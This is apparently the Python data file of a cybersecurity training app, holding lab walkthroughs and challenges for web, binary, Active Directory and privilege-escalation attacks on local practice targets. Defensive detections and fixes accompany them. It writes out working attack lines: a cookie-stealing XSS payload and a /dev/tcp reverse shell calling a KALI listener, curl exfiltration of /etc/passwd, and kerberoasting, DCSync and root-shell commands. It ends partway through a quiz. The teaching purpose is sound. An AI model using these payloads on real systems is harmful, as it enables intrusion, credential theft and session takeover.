# -*- coding: utf-8 -*-
# Cybersecurity-Mastery - an interactive, offline cybersecurity learning app.
# Copyright (C) 2026 Nithees Narendra S
# SPDX-License-Identifier: GPL-3.0-or-later
#
# This file is part of Cybersecurity-Mastery. It is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version. There is NO WARRANTY. See the
# LICENSE file for the full text. For use outside the GPL-3.0 terms (e.g.
# proprietary/commercial), contact the copyright holder for a separate licence.

"""Hands-on Practice content, keyed by chapter slug.

This is the "do" half of each chapter. Rendered by lab_platform.render_practice().
Slugs without an entry get a strong domain-aware template built from the part
environment (partlabs.py). Author more entries to deepen hands-on coverage.

PRACTICE[slug] = {
    "env":        section_id whose part environment this lab uses (for the link),
    "target":     short human string naming the target + how to reach it,
    "intro":      one line framing the exercise,
    "walkthrough":[(goal, command, expected_output, why), ...],  # the guided part
    "challenges": [(task, hint, solution), ...],                 # try-it-yourself
    "detect":     [str, ...],                                    # blue-team view
    "skills":     [str, ...],                                    # skills-check list
}
command / expected_output may be multi-line strings (rendered as code blocks).
"""

PRACTICE = {
    # ---------------------------------------------------------------- web
    "sql-injection": {
        "env": "03-web-security",
        "target": "bWAPP → *SQL Injection (GET/Search)* at http://localhost:8081 (set security LOW)",
        "intro": "Confirm an injection, extract the database by hand with UNION, automate with sqlmap, then fix it.",
        "walkthrough": [
            ("Confirm the input reaches SQL",
             "curl -s \"http://localhost:8081/sqli_1.php?title='&action=search\" | grep -i error",
             "You are an error in your SQL syntax ... near '''",
             "A single quote breaks the query — proof your input is being parsed as SQL, not data."),
            ("Find the column count",
             "http://localhost:8081/sqli_1.php?title=x' ORDER BY 8-- -&action=search   # increase until it errors",
             "ORDER BY 8 → error;  ORDER BY 7 → OK   ⇒ 7 columns",
             "UNION needs a matching column count; ORDER BY probes it without guessing blindly."),
            ("Reflect data with UNION",
             "http://localhost:8081/sqli_1.php?title=x' UNION SELECT 1,2,3,4,5,6,7-- -&action=search",
             "The page prints '2', '3'... — those columns are reflected and usable.",
             "Now you know which columns render, so you can place real queries there."),
            ("Dump credentials",
             "...UNION SELECT 1,login,password,4,5,6,7 FROM users-- -",
             "A_I_M / 6885858486f31043e5839c735d99457f044833db (an MD5 hash)",
             "You extracted real rows; the hash can be cracked offline (hashcat -m 0)."),
            ("Automate + validate",
             "sqlmap -u \"http://localhost:8081/sqli_1.php?title=x&action=search\" --cookie=\"...\" --batch --dump -T users",
             "sqlmap identifies the injection type and dumps the users table.",
             "sqlmap confirms your manual finding and shows how a tool scales it."),
            ("Fix and re-test",
             "# parameterised: cur.execute('SELECT ... WHERE title = %s', (title,))",
             "After the fix, the quote payload returns *no rows* instead of an error.",
             "Parameterisation sends structure and data separately — the class is closed, not just one payload."),
        ],
        "challenges": [
            ("Extract the database version and current user using only the UNION injection (no sqlmap).",
             "Put `@@version` and `current_user()` in two reflected columns.",
             "`...UNION SELECT 1,@@version,current_user(),4,5,6,7-- -`"),
            ("Crack one dumped password hash offline and log in as that user.",
             "The hashes are unsalted MD5. `hashcat -m 0 hash.txt rockyou.txt`.",
             "e.g. the hash for `bee` cracks to `bug`; log in to confirm."),
            ("Raise DVWA to security level *medium* and get the same data — what changed and why?",
             "Medium uses `mysqli_real_escape_string` and a POST id; escaping ≠ parameterising.",
             "Numeric context often isn't quoted, so `1 UNION SELECT ...` still works — escaping strings doesn't help numeric injection."),
        ],
        "detect": [
            "Tail the target's access log while you attack: the `'`, `UNION`, and `information_schema` markers stand out.",
            "Write a Sigma rule matching `union.*select` / `information_schema` in URI parameters and test it against the captured log.",
        ],
        "skills": [
            "Identify an injectable parameter and its context (string vs numeric).",
            "Extract arbitrary data with a hand-built UNION query.",
            "Automate and validate with sqlmap, and explain what it did.",
            "Remediate with parameterised queries and prove the class is closed.",
        ],
    },

    "xss": {
        "env": "03-web-security",
        "target": "Juice Shop http://localhost:8083 (reflected + DOM) and bWAPP (stored)",
        "intro": "Fire reflected, stored and DOM XSS, escalate to a cookie-steal against a listener you control, then kill it with encoding + CSP.",
        "walkthrough": [
            ("Reflected: probe the search box",
             "http://localhost:8083/#/search?q=<script>alert(document.domain)</script>",
             "An alert box shows the origin — your script ran in the page.",
             "Input reached an HTML context unescaped; the browser parsed it as code."),
            ("Inspect the context",
             "# view source around the reflection",
             "Your payload sits inside the page's HTML body, unencoded.",
             "The correct fix depends on *where* it lands — here, HTML-body encoding."),
            ("Stored: persist a payload (bWAPP)",
             "# bWAPP → XSS - Stored (Blog): submit  <script>alert('stored')</script>",
             "Every visitor to the blog page now triggers the alert.",
             "Stored XSS needs no lure and hits every viewer — highest impact."),
            ("DOM: source → sink",
             "http://localhost:8083/#/...  (value flows from location.hash into innerHTML)",
             "The payload executes without the server ever seeing it.",
             "DOM XSS is a client-side dataflow bug; server-side encoding won't help."),
            ("Escalate impact (lab)",
             "nc -lvnp 9001   # then inject: <script>new Image().src='http://KALI:9001/c='+document.cookie</script>",
             "Your listener receives a request containing the victim cookie.",
             "This is why XSS is 'session takeover', not 'just a popup'."),
            ("Fix and re-test",
             "# output-encode for context; add: Content-Security-Policy: script-src 'self'; set HttpOnly cookies",
             "Payloads now render as inert text; CSP blocks inline script; cookie is invisible to JS.",
             "Encoding stops injection; CSP + HttpOnly limit blast radius when something slips through."),
        ],
        "challenges": [
            ("Get an XSS to fire *without* the string `script` (Juice Shop filters it).",
             "Event handlers don't need <script>.",
             "`<img src=x onerror=alert(1)>` or `<svg onload=alert(1)>`"),
            ("Find the Juice Shop DOM XSS and explain the exact source and sink.",
             "Use the browser devtools; trace a URL fragment into a DOM write.",
             "The search/track params flow into Angular/innerHTML sinks; DOM Invader (Burp) automates finding it."),
            ("Write a CSP that would have blocked your reflected payload but still allows the app to work.",
             "Avoid `unsafe-inline`; use a nonce or 'self'.",
             "`Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'`"),
        ],
        "detect": [
            "In the proxy history, spot the outbound request to your listener — that exfil call is the hunt signal.",
            "A CSP in report-only mode logs violations; feed those reports to your SIEM as an XSS tripwire.",
        ],
        "skills": [
            "Trigger reflected, stored and DOM XSS and name the sink/context of each.",
            "Demonstrate real impact (cookie theft) safely against your own listener.",
            "Deploy context-aware encoding, CSP and HttpOnly and verify each payload is neutralised.",
        ],
    },

    "csrf": {
        "env": "03-web-security",
        "target": "bWAPP → *CSRF (Change Password/Secret)* at http://localhost:8081",
        "intro": "Forge a state-changing request from an attacker page, then defend with a token and SameSite.",
        "walkthrough": [
            ("Capture the state-changing request",
             "# In Burp, change the bWAPP secret and read the POST",
             "POST /csrf_1.php  body: password_new=x&password_conf=x&action=change",
             "This is the request you'll forge — note it relies only on the session cookie."),
            ("Build an attacker page",
             "<form action=\"http://localhost:8081/csrf_1.php\" method=POST>\n <input name=password_new value=hacked>\n <input name=password_conf value=hacked>\n <input name=action value=change></form>\n<script>document.forms[0].submit()</script>",
             "Save as evil.html and open it while logged into bWAPP.",
             "The browser attaches the bWAPP cookie automatically — the change succeeds."),
            ("Confirm the forgery worked",
             "# log in with the new value the attacker set",
             "The secret/password changed without the user's intent.",
             "A valid cookie was treated as user intent — the core CSRF flaw."),
            ("Fix: token + SameSite",
             "# add a per-session csrf token to the form and verify server-side; set cookie SameSite=Lax",
             "The forged POST is now rejected (missing/invalid token); cross-site cookies stop riding along.",
             "The attacker's page can't read the token and can't send the cookie cross-site."),
        ],
        "challenges": [
            ("Does the attack still work if the endpoint uses GET instead of POST? Demonstrate.",
             "An <img> tag issues a GET cross-site with cookies.",
             "`<img src=\"http://localhost:8081/csrf_1.php?password_new=x&password_conf=x&action=change\">` — yes, GET is worse."),
            ("Set the session cookie to SameSite=Strict and explain what breaks for legitimate users.",
             "Strict blocks cookies even on top-level navigation from other sites.",
             "Following a link from email won't carry the session — you land logged out; Lax is the usual balance."),
            ("Bypass a CSRF defence that only checks the Referer header.",
             "Referer can be absent or partially controllable.",
             "Strip the Referer (`<meta name=referrer content=no-referrer>`) or use an allowed-prefix trick; hence tokens, not Referer, are the control."),
        ],
        "detect": [
            "Server-side: log requests whose Origin/Referer is cross-site on state-changing endpoints.",
            "A spike of state changes with mismatched Origin is a CSRF-attempt signal.",
        ],
        "skills": [
            "Forge a working cross-site state change against a cookie-authenticated endpoint.",
            "Explain why SameSite and anti-CSRF tokens each stop it.",
            "Reason about GET-vs-POST and Referer-only defences.",
        ],
    },

    "command-injection": {
        "env": "03-web-security",
        "target": "bWAPP → *OS Command Injection* at http://localhost:8081 (DNS lookup form)",
        "intro": "Turn a 'ping/lookup' feature into command execution, go blind, then fix it by removing the shell.",
        "walkthrough": [
            ("Baseline the feature",
             "# bWAPP commandi.php: enter  www.nsa.gov",
             "The page returns nslookup output — the app shells out to a system command.",
             "Any place the app runs a shell with your input is a candidate."),
            ("Inject a second command",
             "www.nsa.gov; id",
             "uid=33(www-data) gid=33(www-data) groups=33(www-data)",
             "The `;` ended the intended command and the shell ran `id` next — code execution as www-data."),
            ("Go blind (no output path)",
             "www.nsa.gov; sleep 5",
             "The response takes ~5s — command runs even when output isn't shown.",
             "Timing (or an OOB callback) confirms blind injection."),
            ("Get a shell (lab)",
             "www.nsa.gov; bash -c 'bash -i >& /dev/tcp/KALI/9001 0>&1'   # nc -lvnp 9001 on Kali",
             "A reverse shell lands on your listener as www-data.",
             "Injection → interactive foothold; now privesc would follow (see that chapter)."),
            ("Fix: no shell",
             "# subprocess.run(['nslookup', host], shell=False)  + allow-list the host format",
             "`; id` is now treated as part of the hostname argument and simply fails to resolve.",
             "With no shell, metacharacters are inert data — the whole class is gone."),
        ],
        "challenges": [
            ("Exfiltrate `/etc/passwd` one line at a time using only blind injection (no reverse shell).",
             "Use an OOB channel: DNS/HTTP callback with command output in the request.",
             "`...; curl http://KALI:9001/$(head -1 /etc/passwd|base64)` and read your listener log."),
            ("The app blocks `;` and `&`. Get execution anyway.",
             "Newlines, `|`, `$()` and backticks also chain/substitute.",
             "`www.nsa.gov%0aid` (URL-encoded newline) or `$(id)` command substitution."),
            ("Demonstrate argument injection with NO metacharacters at all.",
             "A leading dash makes your input look like a flag.",
             "Against a tool like `find`/`tar`, an input of `-exec ...` or `--checkpoint-action` abuses parsing without any `;`."),
        ],
        "detect": [
            "Alert on the web-server user (`www-data`) spawning child processes like `sh`, `bash`, `curl`, `nslookup`.",
            "Auditd/Sysmon process-creation events with a web process parent are high-signal.",
        ],
        "skills": [
            "Prove in-band and blind command injection and get a foothold safely.",
            "Bypass naive metacharacter filters and explain argument injection.",
            "Remediate by removing the shell (shell=False) and allow-listing input.",
        ],
    },

    "idor": {
        "env": "03-web-security",
        "target": "Juice Shop http://localhost:8083 (basket / order history) or bWAPP IDOR",
        "intro": "Access another user's objects by changing an identifier, then enforce object-level authorization.",
        "walkthrough": [
            ("Find an object reference",
             "# log in, open your basket; note the id in the request: GET /rest/basket/1",
             "Your basket is id 1.",
             "The id is user-controllable and maps directly to a database row."),
            ("Change the reference",
             "curl -s http://localhost:8083/rest/basket/2 -H \"Authorization: Bearer $TOKEN\"",
             "You receive basket 2 — another user's items.",
             "The server checked authentication (valid token) but not *ownership* — classic IDOR."),
            ("Enumerate",
             "for i in $(seq 1 20); do curl -s .../rest/basket/$i ...; done",
             "Multiple baskets returned across users.",
             "Sequential ids make bulk access trivial — the impact scales."),
            ("Fix: object-level checks",
             "# WHERE basket.id = :id AND basket.user_id = :current_user",
             "Requests for baskets you don't own now return 403/404.",
             "Authorization must be checked per object, not just 'is the user logged in'."),
        ],
        "challenges": [
            ("Find an IDOR that leaks data via a non-numeric identifier (UUID/filename).",
             "UUIDs aren't guessable but may leak via other endpoints/responses.",
             "Harvest ids from listing endpoints or referrers, then replay — 'unguessable' ≠ 'authorized'."),
            ("Escalate an IDOR from read to write (change someone else's object).",
             "Try the same id swap on PUT/PATCH/DELETE.",
             "If write endpoints share the missing ownership check, you can modify others' data — often higher impact."),
            ("Explain why rate-limiting alone doesn't fix IDOR.",
             "Rate limiting slows enumeration; it doesn't add authorization.",
             "A single unauthorized read is still a breach; the fix is per-object authz, not throttling."),
        ],
        "detect": [
            "Alert on one account requesting many distinct object ids in a short window.",
            "Log authorization decisions; a burst of 200s across sequential ids from one session is an IDOR signal.",
        ],
        "skills": [
            "Identify and exploit object-level authorization gaps for read and write.",
            "Reason about guessable vs unguessable identifiers.",
            "Implement and verify per-object authorization.",
        ],
    },

    "jwt": {
        "env": "03-web-security",
        "target": "A lab JWT app (or Juice Shop token). Tooling: jwt_tool, hashcat.",
        "intro": "Break weak JWT verification (alg confusion, weak secret) then harden it.",
        "walkthrough": [
            ("Decode the token",
             "jwt_tool eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...",
             "Header {alg: HS256}, claims {user: bob, role: user}",
             "JWTs are signed, not encrypted — you can read (not yet forge) the claims."),
            ("Test alg:none",
             "jwt_tool <token> -X a",
             "If accepted, the server trusts an unsigned token.",
             "Broken libraries treat alg:none as valid — instant forgery."),
            ("Crack a weak HMAC secret",
             "hashcat -m 16500 token.txt rockyou.txt",
             "Recovered secret: 'secret'",
             "A guessable HS256 key lets you sign arbitrary tokens."),
            ("Forge an admin token",
             "jwt_tool <token> -S hs256 -p 'secret' -pc role -pv admin",
             "A valid token with role=admin.",
             "Present it and the app grants admin — authentication bypass."),
            ("Fix",
             "# pin alg server-side; reject none; use a 256-bit random key; validate exp/aud/iss",
             "Forged/none/weak-key tokens are all rejected.",
             "Verification must be strict about algorithm and key, not just 'signature present'."),
        ],
        "challenges": [
            ("Perform an RS256→HS256 algorithm-confusion forgery.",
             "Sign with HS256 using the server's *public* key as the HMAC secret.",
             "`jwt_tool <token> -X k -pk public.pem` — if the server uses one 'verify' call, it treats the public key as the HMAC secret."),
            ("Forge a token via kid header injection.",
             "kid may be used to select a key from a path or DB.",
             "Point kid at a file with known contents (`/dev/null` → empty key) or inject SQL into a kid lookup."),
            ("Explain why short expiries don't fix a weak signing key.",
             "Forgery mints fresh tokens at will.",
             "If you hold the key you set exp yourself; key strength, not lifetime, is the control."),
        ],
        "detect": [
            "Log and alert on tokens with alg=none or unexpected alg values reaching verification.",
            "Sudden role escalations without a corresponding privileged action are a forged-token signal.",
        ],
        "skills": [
            "Read a JWT and test alg:none, weak-secret and alg-confusion flaws.",
            "Forge a privileged token against a weak implementation.",
            "Harden verification (pin alg, strong key, validate claims).",
        ],
    },

    # ---------------------------------------------------------------- binary
    "buffer-overflow": {
        "env": "04-vulnerabilities",
        "target": "the `pwn-box` build container (compile the vulnerable C yourself)",
        "intro": "Take a vulnerable C program from crash to a called win() function, then watch each mitigation break the exploit.",
        "walkthrough": [
            ("Write and compile the target (mitigations off)",
             "gcc -fno-stack-protector -z execstack -no-pie -g vuln.c -o vuln   # vuln.c: gets(buf) + a win() fn",
             "A binary that reads input into a fixed buffer with no bounds check.",
             "We turn mitigations off first to see the raw bug before defeating defences."),
            ("Trigger the crash",
             "python3 -c 'print(\"A\"*200)' | ./vuln",
             "Segmentation fault (core dumped)",
             "You overwrote the saved return address with 0x41414141 — control of execution is near."),
            ("Find the exact offset",
             "pwn cyclic 200 | ./vuln    # then in gdb: pwn cyclic -l $rsp_value",
             "Offset to return address: 72",
             "Precise offset means you can place your target address exactly on the return slot."),
            ("Redirect to win() (ret2win)",
             "python3 -c 'import pwn; print(pwn.flat(b\"A\"*72, pwn.p64(WIN_ADDR)))' | ./vuln",
             "Congratulations — win() executed and printed the flag.",
             "You controlled RIP and called code of your choosing — the essence of exploitation."),
            ("Turn mitigations on and watch it break",
             "gcc -fstack-protector-all -pie -o vuln2 vuln.c   # then re-run your exploit",
             "*** stack smashing detected ***  (canary), and PIE randomises WIN_ADDR",
             "Each mitigation removes an assumption; real targets need leaks + ROP (next chapter)."),
        ],
        "challenges": [
            ("Rebuild with NX (drop -z execstack) and achieve execution with a ret2libc/ROP chain.",
             "You can't run shellcode on the stack now; reuse existing code.",
             "Use pwntools' ROP: `rop.call(system, [bin_sh])` after leaking a libc address."),
            ("Defeat the stack canary by leaking it first.",
             "A format-string or over-read can disclose the canary before you overwrite it.",
             "Read the canary, include it unchanged in your payload, then overwrite past it."),
            ("Explain, with checksec output, exactly which mitigation stopped each exploit attempt.",
             "`checksec ./vuln` reports Canary/NX/PIE/RELRO.",
             "Map each failure: canary→abort, NX→no shellcode, PIE→wrong address, to the checksec flags."),
        ],
        "detect": [
            "On real systems, a crash/abort in a network service (segfault, 'stack smashing detected') is a probe signal — monitor core dumps and service restarts.",
            "Exploit mitigations (ASLR/NX/CET) are the primary 'detection' here — they convert bugs into crashes instead of compromise.",
        ],
        "skills": [
            "Crash a vulnerable binary and find the return-address offset precisely.",
            "Achieve controlled execution (ret2win) with pwntools.",
            "Explain how canary, NX and PIE each break the classic exploit.",
        ],
    },

    # ---------------------------------------------------------------- offensive
    "scanning": {
        "env": "01-networking",
        "target": "`net-target` (Metasploitable 2) on labnet",
        "intro": "Go from 'a subnet exists' to a full service/vuln picture with escalating Nmap technique.",
        "walkthrough": [
            ("Discover live hosts",
             "nmap -sn 172.18.0.0/24",
             "Host is up (0.00040s latency). 172.18.0.2",
             "Ping sweep finds targets without touching ports — cheap and quiet."),
            ("Find open ports",
             "nmap -p- --min-rate 2000 172.18.0.2",
             "21,22,23,25,80,139,445,3306,5432... open",
             "A full TCP scan reveals the whole listening surface, not just the common ports."),
            ("Fingerprint services",
             "nmap -sV -sC 172.18.0.2",
             "vsftpd 2.3.4, OpenSSH 4.7p1, Apache 2.2.8, MySQL 5.0.51a...",
             "Versions map to known CVEs; default scripts add quick wins."),
            ("Targeted vuln scripts",
             "nmap --script vuln -p 21,80,139 172.18.0.2",
             "ftp-vsftpd-backdoor: VULNERABLE (CVE-2011-2523)",
             "NSE flags exploitable services so you know where to focus."),
            ("Save everything",
             "nmap -A -oA scan 172.18.0.2",
             "scan.nmap / .xml / .gnmap written.",
             "Machine-readable output feeds the rest of your workflow and your report."),
        ],
        "challenges": [
            ("Scan the same host as quietly as possible and compare what an IDS would see.",
             "Slower timing, fewer ports, no version probes.",
             "`-T2 -sS --top-ports 20` produces far fewer packets than `-A -T4 -p-`; capture both in Wireshark to compare."),
            ("Identify one service you could exploit and cite its CVE — don't exploit yet.",
             "vsftpd 2.3.4 and UnrealIRCd both have famous backdoors here.",
             "vsftpd 2.3.4 → CVE-2011-2523 backdoor; note it for the Exploitation chapter."),
            ("Write an nmap command that only checks whether SMB signing is enforced.",
             "There's an NSE script for exactly this.",
             "`nmap --script smb2-security-mode -p445 <ip>`"),
        ],
        "detect": [
            "In a Wireshark capture, a SYN scan appears as many SYNs with no completed handshakes — the IDS signature.",
            "Suricata/Snort ship port-scan rules; run one and watch your scan light it up.",
        ],
        "skills": [
            "Discover hosts, enumerate ports, and fingerprint services with Nmap.",
            "Tune scans for speed vs stealth and predict the telemetry.",
            "Turn scan output into a prioritised list of exploitable services.",
        ],
    },

    "active-directory-attacks": {
        "env": "12-identity",
        "target": "Samba AD-DC (basics) or GOAD (full forest). Tooling: netexec, bloodhound, impacket, hashcat.",
        "intro": "Walk from an unprivileged foothold to Domain Admin via Kerberoasting and an ACL/DCSync path.",
        "walkthrough": [
            ("Enumerate the domain",
             "netexec smb 172.20.0.10 -u bob -p 'Passw0rd' --users --groups",
             "Domain LAB.LOCAL, users list, group memberships.",
             "Even a low-priv account can read most of the directory — the graph starts here."),
            ("Collect the attack graph",
             "bloodhound-python -u bob -p 'Passw0rd' -d lab.local -c All -ns 172.20.0.10",
             "JSON files ready to import into BloodHound.",
             "BloodHound turns AD permissions into shortest-path-to-DA queries."),
            ("Kerberoast a service account",
             "impacket-GetUserSPNs -request -dc-ip 172.20.0.10 lab.local/bob:Passw0rd",
             "A $krb5tgs$ hash for the 'sqlsvc' account.",
             "Service tickets are encrypted with the account's password key — crackable offline."),
            ("Crack it",
             "hashcat -m 13100 sqlsvc.hash rockyou.txt",
             "sqlsvc:Summer2024!",
             "Weak service-account passwords are the most common AD foothold-to-privilege step."),
            ("Escalate + DCSync",
             "# BloodHound path: sqlsvc has GenericAll on an admin → reset pw → DCSync\nimpacket-secretsdump -just-dc lab.local/admin@172.20.0.10",
             "krbtgt:502:aad3b...:<hash>  (domain hashes dumped)",
             "The krbtgt hash is the master key — full domain compromise and Golden-Ticket persistence."),
        ],
        "challenges": [
            ("AS-REP roast an account with pre-auth disabled and crack it — no credentials needed.",
             "`impacket-GetNPUsers` finds them.",
             "`impacket-GetNPUsers lab.local/ -usersfile users.txt -dc-ip 172.20.0.10`, then `hashcat -m 18200`."),
            ("Use the cracked service account to move laterally with pass-the-hash.",
             "netexec accepts NTLM hashes with -H.",
             "`netexec smb <targets> -u sqlsvc -H <nthash>` then `impacket-psexec -hashes :<nthash> ...`"),
            ("Forge a Golden Ticket with the krbtgt hash and access a service as a fake admin.",
             "impacket-ticketer builds it.",
             "`impacket-ticketer -nthash <krbtgt> -domain-sid <sid> -domain lab.local fakeadmin` then use the ccache."),
        ],
        "detect": [
            "Event 4769 with RC4 (0x17) and many SPNs from one account = Kerberoasting.",
            "Replication (DsGetNCChanges / Event 4662) from a non-DC principal = DCSync.",
            "Anomalous ticket lifetimes / tickets for non-existent accounts = Golden Ticket.",
        ],
        "skills": [
            "Enumerate AD and find an attack path with BloodHound.",
            "Kerberoast/AS-REP roast and crack service credentials.",
            "Chain ACL abuse → DCSync → domain dominance, and name each detection.",
        ],
    },

    "privilege-escalation": {
        "env": "06-offensive-security",
        "target": "`target-linux` (Metasploitable) or any lab host where you have a low-priv shell",
        "intro": "From a www-data foothold to root via systematic enumeration and a misconfiguration.",
        "walkthrough": [
            ("Enumerate automatically",
             "./linpeas.sh | tee linpeas.txt",
             "Highlighted: sudo rights, SUID binaries, writable cron, kernel version.",
             "linpeas surfaces candidates fast; you still verify each by hand."),
            ("Check sudo rights",
             "sudo -l",
             "(root) NOPASSWD: /usr/bin/find",
             "A binary you can run as root is a direct path if it can spawn a shell."),
            ("Abuse it (GTFOBins)",
             "sudo find . -exec /bin/sh -p \\; -quit",
             "# whoami → root",
             "find can execute commands; run as root it hands you a root shell."),
            ("Alternative: SUID",
             "find / -perm -4000 -type f 2>/dev/null",
             "/usr/bin/... an unexpected SUID binary",
             "SUID-root binaries run as root; GTFOBins lists which ones give a shell."),
            ("Harden",
             "# remove NOPASSWD, strip needless SUID bits, patch the kernel",
             "sudo -l no longer lists a shell-capable binary; the path is closed.",
             "Least privilege on sudo and SUID removes the most common Linux privesc paths."),
        ],
        "challenges": [
            ("Escalate via a writable cron job instead of sudo.",
             "Find a root cron running a script you can edit.",
             "Append a reverse shell / `chmod +s /bin/bash` to the writable script and wait for the cron tick."),
            ("Escalate using a Linux capability rather than SUID.",
             "`getcap -r / 2>/dev/null`.",
             "A binary with `cap_setuid+ep` (e.g. python) → `python -c 'import os;os.setuid(0);os.system(\"/bin/bash\")'`."),
            ("You're in the `docker` group but not root — get root.",
             "The docker group is root-equivalent.",
             "`docker run -v /:/mnt --rm -it alpine chroot /mnt sh` mounts the host filesystem as root."),
        ],
        "detect": [
            "auditd/Sysmon: a web-service user spawning a root shell, or execution of SUID binaries by service accounts.",
            "Alert on writes to cron directories and on new SUID files (baseline them).",
        ],
        "skills": [
            "Enumerate a host for privesc vectors methodically.",
            "Exploit sudo/SUID/capabilities/docker-group misconfigurations.",
            "Recommend the specific hardening that closes each vector.",
        ],
    },

    # ---------------------------------------------------------------- blue team
    "yara": {
        "env": "08-malware",
        "target": "the isolated `analysis-box` with a folder of benign lab samples + a clean corpus",
        "intro": "Write a precise YARA rule that catches a family without false-positiving on clean files.",
        "walkthrough": [
            ("Find distinguishing strings",
             "strings -n 8 sample1.bin | sort | uniq -c | sort -rn | head",
             "Recurring markers: 'X-Bot/1.2', a mutex name, a config marker.",
             "Good rules key on stable, distinctive artefacts, not incidental bytes."),
            ("Draft a rule",
             "rule XBot {\n  strings:\n    $ua = \"X-Bot/1.2\"\n    $mx = \"Global\\\\xb0mtx\" wide\n  condition:\n    uint16(0)==0x5A4D and all of them\n}",
             "A rule matching the PE magic and both markers.",
             "Anchoring on the MZ header + specific strings keeps it fast and precise."),
            ("Test against the family",
             "yara XBot.yar samples/",
             "sample1.bin, sample2.bin match; the rest don't.",
             "It catches the family — now prove it doesn't over-match."),
            ("Test against clean files",
             "yara XBot.yar /usr/bin/",
             "(no output)",
             "Zero false positives on a clean corpus — the rule is deployable."),
            ("Tune for performance",
             "# add a filesize guard and prefer anchored strings",
             "condition: filesize < 2MB and uint16(0)==0x5A4D and all of them",
             "Cheap conditions first means the scanner rejects non-candidates instantly."),
        ],
        "challenges": [
            ("Write a rule that matches the family even after simple string obfuscation (XOR).",
             "YARA supports xor modifiers.",
             "`$s = \"X-Bot\" xor` matches the string under any single-byte XOR key."),
            ("Add a rule that catches packed variants by section entropy or a packer signature.",
             "Use the `math` or `pe` module.",
             "`import \"math\"` → `math.entropy(0, filesize) > 7.2` flags likely-packed samples."),
            ("Explain how to avoid a rule that matches on the compiler runtime (false-positive trap).",
             "Common library strings appear in benign files too.",
             "Exclude generic runtime strings; require multiple *unique* markers, and always test on a clean corpus."),
        ],
        "detect": [
            "Deploy the rule in your EDR/scanner and on mail/file gateways.",
            "Feed matches into the SIEM as detections; track false positives and tune.",
        ],
        "skills": [
            "Extract durable indicators from a sample set.",
            "Write precise, performant YARA rules and validate against a clean corpus.",
            "Handle obfuscation and packing in rules.",
        ],
    },

    "memory-forensics": {
        "env": "13-digital-forensics",
        "target": "`dfir-box` with a lab RAM image under /evidence (e.g. a CyberDefenders image)",
        "intro": "Reconstruct an intrusion from a memory image with Volatility 3.",
        "walkthrough": [
            ("List processes",
             "vol -f /evidence/mem.raw windows.pslist",
             "A tree including a suspicious powershell.exe under winword.exe.",
             "Office spawning PowerShell is a classic macro-to-payload pattern."),
            ("Hunt hidden/terminated processes",
             "vol -f /evidence/mem.raw windows.psscan",
             "A process missing from pslist but present in psscan.",
             "psscan finds processes hidden from the active list — an evasion signal."),
            ("Find network connections",
             "vol -f /evidence/mem.raw windows.netscan",
             "An outbound TCP connection to 185.x.x.x:443 from the suspicious PID.",
             "Ties the host to a likely C2 endpoint."),
            ("Detect injected code",
             "vol -f /evidence/mem.raw windows.malfind",
             "RWX private memory with MZ/shellcode in the suspicious process.",
             "malfind flags injected/unbacked executable memory — likely the implant."),
            ("Extract and triage",
             "vol -f /evidence/mem.raw windows.dumpfiles --pid <pid>",
             "The malicious module written to disk for static analysis.",
             "Now you can YARA-scan and reverse the artefact you recovered."),
        ],
        "challenges": [
            ("Recover the command line the attacker ran.",
             "There's a plugin for process command lines.",
             "`windows.cmdline` reveals the full command, often the encoded PowerShell payload."),
            ("Find persistence established by the intrusion.",
             "Registry run keys live in memory too.",
             "`windows.registry.printkey` on the Run keys, or `windows.getsids`/services plugins."),
            ("Build a short timeline of the attacker's actions from the memory artefacts.",
             "Correlate process start times, network connections and files.",
             "Combine pslist times + netscan + cmdline into a narrative; export with `timeliner`."),
        ],
        "detect": [
            "The live equivalents: EDR flags Office→PowerShell, injected RWX memory, and beaconing.",
            "Turn each memory finding into a detection (Sigma for the process lineage, network rule for the C2).",
        ],
        "skills": [
            "Triage a memory image with Volatility 3.",
            "Identify injected code, hidden processes and C2.",
            "Recover artefacts and reconstruct an attack timeline.",
        ],
    },

    "threat-hunting": {
        "env": "07-defensive-security",
        "target": "the Wazuh/ELK stack with telemetry from the victim host",
        "intro": "Run one full hypothesis-driven hunt loop and turn the result into a standing detection.",
        "walkthrough": [
            ("Form a hypothesis",
             "# 'An adversary is Kerberoasting: many 4769 with RC4 from one account.'",
             "A specific, testable statement tied to ATT&CK T1558.003.",
             "A good hunt starts narrow and falsifiable, not 'look for bad stuff'."),
            ("Confirm you have the data",
             "# check that Windows 4769 events are being ingested",
             "4769 events present with TicketEncryptionType field.",
             "You can only hunt what you collect — verify the data source first."),
            ("Query for the pattern",
             "index=win EventCode=4769 TicketEncryptionType=0x17\n| stats dc(ServiceName) as svcs by Account\n| where svcs > 10",
             "One account requested tickets for 14 distinct SPNs with RC4.",
             "That fan-out with RC4 is the Kerberoasting fingerprint."),
            ("Triage",
             "# pivot on that account's other activity and logon source",
             "The account is a workstation user, not a scanner — suspicious.",
             "Separate benign (vuln scanners, apps) from real attacker behaviour by context."),
            ("Operationalise",
             "# write a Sigma rule for the pattern and deploy it",
             "A standing detection now fires automatically on recurrence.",
             "Every confirmed hunt should become a detection so the work compounds."),
        ],
        "challenges": [
            ("Generate the telemetry yourself with Atomic Red Team, then hunt it.",
             "Atomic has tests mapped to ATT&CK technique IDs.",
             "`Invoke-AtomicTest T1558.003` on the lab host, then run your query and confirm it fires."),
            ("Write a hunt for lateral movement via WMI (T1047) and name the data source.",
             "Process creation with a wmiprvse.exe parent.",
             "Sysmon Event 1 where ParentImage ends with wmiprvse.exe spawning shells/LOLBins."),
            ("Explain why hunting for the attacker's C2 IP is weaker than hunting the behaviour.",
             "Think Pyramid of Pain.",
             "IPs rotate trivially (bottom of the pyramid); the TTP (roasting/WMI) is costly for the adversary to change."),
        ],
        "detect": [
            "This chapter *is* the blue side — each hunt output becomes a Sigma detection.",
            "Track hunt→detection conversion and dwell-time reduction as program metrics.",
        ],
        "skills": [
            "Frame and run a hypothesis-driven hunt tied to ATT&CK.",
            "Validate hunts with Atomic Red Team.",
            "Convert findings into durable detections.",
        ],
    },
}


# --------------------------------------------------------------------------
# Interactive quizzes (MCQ) keyed by slug. answer = index of correct option.
# --------------------------------------------------------------------------
QUIZZES = {
    "sql-injection": [
        {"q": "Which control actually eliminates SQL injection (not just slows it)?",
         "options": ["A Web Application Firewall", "Escaping single quotes",
